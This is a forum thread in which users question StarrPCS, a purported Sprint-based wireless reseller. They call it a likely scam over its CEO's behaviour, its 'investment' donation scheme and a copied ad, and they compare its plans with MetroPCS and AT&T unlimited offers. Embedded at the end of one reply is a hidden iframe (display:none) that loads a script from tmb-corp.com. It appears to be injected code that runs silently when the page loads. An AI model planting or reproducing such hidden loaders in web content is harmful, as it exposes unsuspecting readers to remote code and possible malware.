+ Reply to Thread
Page 1 of 2 1 2 LastLast

New PCS service based on Sprint's network

I'm not sure if anyone has seen this discussion on the sprintuser.com discussion board. It is about a new company called StarrPCS that is to start service on Sept 30. The network is based on Sprint (so any Sprint phone will work on their network and the coverage will be the same). The big deal is they have an unlimited minutes plan for $69/month. Need unlimited LD, that is $5.50/month. Could be very interesting.

http://www.sprintusers.com/forum/sho...p?threadid=230
    Carl

Re: New PCS service based on Sprint's network

Originally posted by CarlGalgano
    I'm not sure if anyone has seen this discussion on the sprintuser.com discussion board. It is about a new company called StarrPCS that is to start service on Sept 30. The network is based on Sprint (so any Sprint phone will work on their network and the coverage will be the same). The big deal is they have an unlimited minutes plan for $69/month. Need unlimited LD, that is $5.50/month. Could be very interesting.

http://www.sprintusers.com/forum/sho...p?threadid=230
    I just looked over that thread. "DA CEO" needs to do some serious work on his people skills. I'm pretty sceptical about whether or not they can actually deliver something worthwhile... and I'm kinda surprised that Sprint PCS is entering into that kind of partnership.

I will definitely be keeping my eye on this for future developments.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

have you read all of this guys posts?

he is bad mouthing virgin mobile and he is listed as "unregistered"... i think that is tacky of a "CEO" to bad mouth and call another company with censored cuss words...

Originally posted by Marctronixx
    have you read all of this guys posts?

he is bad mouthing virgin mobile and he is listed as "unregistered"... i think that is tacky of a "CEO" to bad mouth and call another company with censored cuss words...
    Well, as the supposed "leader" (i.e. CEO) of a wireless provider he is definitely NOT a person who I would want to give my business to. That doesn't even take into consideration the fact that his company will not be able to meet my needs at the time of their launch. He says that they will have customer service that blows away Sprint PCS. Please... if their CEO doesn't know how to deal with people, how can I expect that their csr's will be any better???

Dude is a joke... but I will follow this story as I am interested in all aspects of wireless technology.

Administrator

Arrow

right on rob...

sept. 30th will be the date to watch eh...

jlv

suspicious

I read all of the thread at sprintusers.com.

This has too many things similar to previous scams such as Worldcore wireless free-for-life and DSL Monster low cost DSL. Both of those promised unbelievably low prices for unbelievably great service. Both were only resellers of other's infrastructure.

I think DaCEO has been up front that they are resellers of Sprint PCS. I think that is a good thing, since Sprint's footprint is so large. A new wireless provider would have to build out a network and it would take years before they had the coverage that Sprint has.

I agree, DaCEOs skills need honing. But, if it is true, it could be interesting and could help to drive down Sprint's pricing. I also like the idea that my i300 or 6035 could be activated. I will also watch this thread and 9/30 with interest.

I am not sure the market can support another nationwide wireless player. We currently have 6 (as best I can tell) and I figure there will only be 2-3 survivors. I perdict there will be a GSM nationwide network (run by Cingular/ATT/Voicestream merger) and a CDMA network (Sprint/Verizon merger). I am not sure how Nextel plays into this as they are a completely different animal.

The next few years will be interesting for sure.
    Carl

Administrator

Arrow

thought id revive this thread so we can all see what happens when the "due date" is reached....

anyone heard anything new on this "company"...

Funny you should mention this Marc. I was thinking about this last night as I was driving home. The web site is still up. AT&T is also offering a $99 unlimited plan here in Atlanta. Is anyone else hearing this offer?
    Carl

I spent a little bit of time on StarrPCS web site. If you look at the FAQ page, most of the questions are directed towards "investing in Starr PCS" rather than answering questions about their service, or when they will launch. Other boards have branded this as a scam. I was reluctant to jump on that bandwagon, but it sure does not look like 9/30 will be a big day for PCS pricing to drop like a rock.
    Carl

Administrator

Arrow

yeah AT & T is offering this nationwide.. its an alll out price war with all of the carriers... cingular is offering "rollover" minutes also...

yeah the first thing i saw on his "updated" website is that little "how to become a partner" jargon on the fornt page.. that was not there on the original one...

if you have not done so carl, drop by the thread listed in the link above in this thread and read what others had to say and also how disrespectful "DA CEO" was...

I have read the entire thread a while ago Marc. I started this thread about StarrPCS. I think $99 will be the going rate for unlimited voice service. It won't be long before everyone, including Sprint has a plan like this.
    Carl

Originally posted by Marctronixx
    yeah AT & T is offering this nationwide.. its an alll out price war with all of the carriers... cingular is offering "rollover" minutes also...
    I like that! Price wars are great for us! But I'm now less interested in voice price wars and more interested in data price wars!

I'm sure that's on the horizon also!

jlv

even more suspicious

Even better than just offering unbelievable low prices on PCS service, now they are touting themselves as a so-called "investment"!
    Become a Starr PCS investor today by investing as little as $50 into Starr. You can receive a monthly check for doing nothing.
    The SEC would be all over them for an apparent unlicensed offering of securities over the Internet, but I'm sure their actual weasel definition of "invest" is to avoid that - if you "invest", you aren't actually investing in anything - you are just giving away your money:
    When Starr PCS™ refers to "Investing" the meaning refers not to stock or a share or part ownership in Starr PCS™ or the Starr Wireless® parent company. When making a investment you understand that you will actually be making a donation to the Starr PCS™ public promotions
    If you don't think that's a scam, I can hook you up with Mariam Abacha, the widow of the late and former head of state of Nigeria. She has this $42M ...

jlv

ah, image stolen, too

The latest thread on the sprintusers board about this scam shows that "Starr PCS"'s new top level page just uses an image stolen from Sprint's PCS Vision page...

Its funny, I read all the thread and I saw one of their ads. Its allmost the same as the MetroPCS!!!:p

By the way, this company is selling pretty good here in Miami, I've seen a LOT of people with these phones!. and they just came out with a new Sony/Ericsonn tiny phone, very cute. too bad they don't have smartphones
    Last edited by yorch; 09-26-2002 at 10:19 AM.
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

Yeah, MetroPCS is also her in GA. I only know one person who had it. Overall he is pleased with it, but has 2 cell phones, one for local Atlanta coverage (with Metro) and the other for the places MetroPCS does not cover or out of town. He is please with the set up, but did say the all "you can eat" price of $35 goes to $42 when you add voice mail and caller ID. I still think it is a good deal. But $99 for unlimited national coverage would be something that is a better deal. Add a $99 a month unlimited wireless plan and it would be about what I pay now.
    Carl

well, I counted them, and I have 8 people close to me that have the phone, this phone is great for regular people that don't travel that often, and for young adults. I actually had played with the phone and is great, has a lot of new features, voice dialing, games, lite PDA, etc, for non geeks (us) people is not really cool enuff, but for the average user, that wants to talk a lot, and don't worry about minutes, this is great. and I've seen a lot of people using these phones and the new sony one at my college.

yeah, with taxes and the caller Id feature comes out $45 or so, still, I pay pretty much the same with sprintpcs, and I have only 25min 2500 weekends.
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

jlv

Re: metropcs compared to starrpcs

The third thread on the "Starr PCS scam" at sprintusers starts out about how the StarrPCS ad was copied from MetroPCS...

I have not read the thread above yet, but Metro PCS is NOT a scam. They are up and running in Atlanta, South Florida and Sacremento, CA.
    Carl